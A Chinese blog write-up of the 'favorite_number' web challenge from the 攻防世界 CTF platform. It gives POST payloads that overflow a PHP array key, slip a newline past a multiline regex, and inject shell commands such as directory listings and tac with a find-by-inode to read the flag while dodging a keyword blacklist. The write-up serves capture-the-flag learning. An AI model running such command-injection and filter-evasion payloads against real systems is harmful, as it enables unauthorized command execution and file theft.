攻防世界【favorite_number】解题方法

已于 2022-06-22 09:57:03 修改
阅读量960 收藏
点赞数 1
分类专栏: 安全 文章标签: php web安全
于 2022-06-21 22:45:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43923736/article/details/125399098
版权

攻防世界【favorite_number】解题方法

1. 简单分析

进入场景,直接给出了php源码
在这里插入图片描述

2. php数组下标溢出

第一层绕过:绕过数组的比较

  • php中使用$_POST["stuff"]接收数组,post请求中需要使用stuff[0]=admin&stuff[1]=user进行传递

  • 为了绕过$stuff[0] != 'admin',利用数组key溢出,把key设置为2^32,即4294967296
    构造payload如下

    stuff[4294967296]=admin&stuff[1]=user&num=123

    在这里插入图片描述

3. 多行匹配

绕过第二层:正则匹配数字
正则表达式 "/^\d+$/im"的意思是匹配一串数字,不能有其它字符,但是/m是多行匹配,即只要有一行匹配成功,preg_match返回true
换行符的ascii码为0x0a,所以构造如下payload

stuff[4294967296]=admin&stuff[1]=user&num=123%0als

在这里插入图片描述

4. 获取目录结构

绕过第三层:绕过过滤敏感关键字
php中有system函数,但是却把cat、flag等关键字过滤掉了
所以为了获取flag,需要先找到flag所在的位置
通过用&&(ascii码为0x26)符号连接多条指令,获取目录结构

stuff[4294967296]=admin&stuff[1]=user&num=123%0acd ../..%26%26pwd%26%26ls

在这里插入图片描述
最终可以获取目录结构如下
在这里插入图片描述

5. 获取文件类型

从前面可以知道,根目录下有一个名为flag的文件或者目录,通过指令

ls -l /

获取详细文件内容如下
在这里插入图片描述

6. 获取flag的inode号

由第一个字符是-可知flag是一个文件,现在只剩下一个问题,如何在不使用cat、flag关键字的情况下读取flag文件的内容
linux每个文件都有一个inode信息,inode结构用于指向一个文件,可以通过find加-inum参数:按照 inode 号搜索文件
首先获取flag文件的inode号

ls -i /

在这里插入图片描述

7. tac显示文件内容

最后再使用tac指令显示flag文件的内容(tac功能同cat,唯一的区别是以行为单位倒序打印文件内容)
其中需要使用开单引号括起来find的结果

tac `find / -inum 4074724`

在这里插入图片描述

另一种方式

思路:把/flag关键字写入到一个文件中,用tac读出来,再以字符串作为tac的参数

cd /tmp
printf /fla > test
printf g >> test
tac `tac test`

注意:

  • 需要切换到tmp目录下,别的目录有些没有创建文件的权限
  • echo被过滤掉了,可以使用printf
且听,雨鸣。
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php时间人性化展示
赛时科技
04-22 158
函数,用于将时间戳转换为人性化的时间差。该函数遍历了不同的时间单位,找到合适的单位来表示时间差,并返回相应的字符串。这样,你就可以根据需要将时间以人性化的方式展示给用户了。你可以根据具体需求调整时间格式和单位。函数将其格式化为"年-月-日 时:分:秒"的形式。然后,我们定义了一个。在上面的示例中,我们首先获取了当前的时间戳,并使用。函数来实现时间的人性化展示。函数将"-2 days"转换为时间戳),然后调用。最后,我们假设有一个过去的时间戳(这里使用。函数将其转换为人性化的时间差,并输出结果。
NOJ史上最全答案
06-29
最全答案有所有西北工业大学网上作业答案,可以无限期使用
攻防世界miss-01,杂项misc太湖杯
11-01
攻防世界miss_01,杂项misc太湖杯。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
noj问题:装盘子
04-26
Problem: 装盘子 时限:1000ms 内存限制:10000K 总时限:3000ms 描述: N人为了大快朵颐,行至云餐二楼,取了N个盘子,打了M个饺子。现欲将M个饺子装入N个盘子中,试问共有多少种不同的装法? 假设盘子足够大,并且盘子里可以什么都不放。注意像2 5 0和5 0 2之类的属于同一种放法。
noj幸运数字7
qq_72548724的博客
11-16 296
幸运数字7
攻防世界-favorite_number-(详细操作)做题笔记
qq_43715020的博客
06-21 1027
攻防世界-favorite_number-(详细操作)做题笔记
攻防世界 web高手进阶区 9分题 favorite_number
闵行小鱼塘
10-29 4208
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是favorite_number的writeup
c语言边沿与内芯的差noj题目,西工大noj答案完整版148.doc
weixin_39625305的博客
05-24 2049
绝对是史上最全版(不止100题哦……按首字母排序)“1“的传奇A+BA+BⅡABACKERMANArithmetic ProgressionsBeeChecksum algorithmCoin TestDexter need helpDoubleEasy problemFavorite numberGraveyardHailstoneHanoi ⅡHouseboatMusic ComposerRe...
CTF笔记 攻防世界 favorite_number
qq_51248658的博客
10-11 435
php整型溢出,linux读取文件,正则绕过 向大佬学习
攻防世界WEB练习-favorite_number
墨鱼菜鸡
09-10 143
目录 题目场景 代码审计及绕过 通过php5.5版本的数组key溢出漏洞进行数组绕过 换行符绕过正则跨行匹配 黑名单绕过 题目场景 <?php //php5.5.9 $stuff=$_POST["stuff"]; $array=['admin','user']; if($stuff===$array&&amp...
攻防世界-favorite_number
qq_44065556的博客
09-29 1543
老样子进入环境,一段代码刷刷下来,闯进脑子里 这里就需要具备php语言的基础了,还有正则的基础,还不会的小伙伴,赶紧补一补 (注意php5.5.9这个版本) 分析一下代码: if($stuff === $array && $stuff[0] != 'admin') //数组判断,强等于,首元素需要不等于 'admin' if (preg_match("/^\d+$/im",$num)) //只允纯数字, 看到谋面的/m了吧,这是开启了多行匹配,所以呢 ^和$不只是字...
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 483
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
bugku ezbypass
m_de_g的博客
04-23 211
bugku ezbypass $++,$_++
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 561
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
最新发布
weixin_37991016的博客
04-27 169
【代码】牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
攻防世界guess_num
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些防护技术,用于增加程序的安全性,防止恶意利用程序的特定漏洞进行攻击。PIE(position-independent executable)使得加载程序时每次都变换加载地址,防止ROP攻击。ASLR(Address Space Layout Randomization)则使得栈帧起始地址随机化,增加攻击者猜测需要攻击位置的难度。这些技术可以提高程序的安全性,减少被攻击的风险。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[攻防世界]guess_num](https://blog.csdn.net/m0_71081503/article/details/125075359)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值